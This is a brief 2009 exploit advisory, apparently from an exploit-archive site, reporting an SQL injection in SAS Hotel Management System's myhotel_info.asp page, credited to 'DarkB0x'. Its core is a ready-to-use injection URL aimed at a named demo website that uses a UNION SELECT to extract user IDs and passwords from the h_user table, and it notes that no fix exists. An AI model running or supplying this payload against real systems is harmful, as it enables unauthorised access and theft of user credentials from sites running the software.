SAS Hotel Management System (myhotel_info.asp) SQL Injection Vulnerability

2009-02-16 18:01:13

SAS Hotel Management System (myhotel_info.asp) SQL Injection Vuln#found by DarkB0x
#contact darkB0x97[AT]googlemail.com
#greets for str0ke & AlpHaNiX

#script : SAS Hotel Management System
#download : Null
#script home page : http://www.sellatsite.com/sellatsite/hotel.asp
#Demo : http://www.aebest.com


#Exploits :

//*/

http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user


#note : the injection's details are in page title ! xD

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.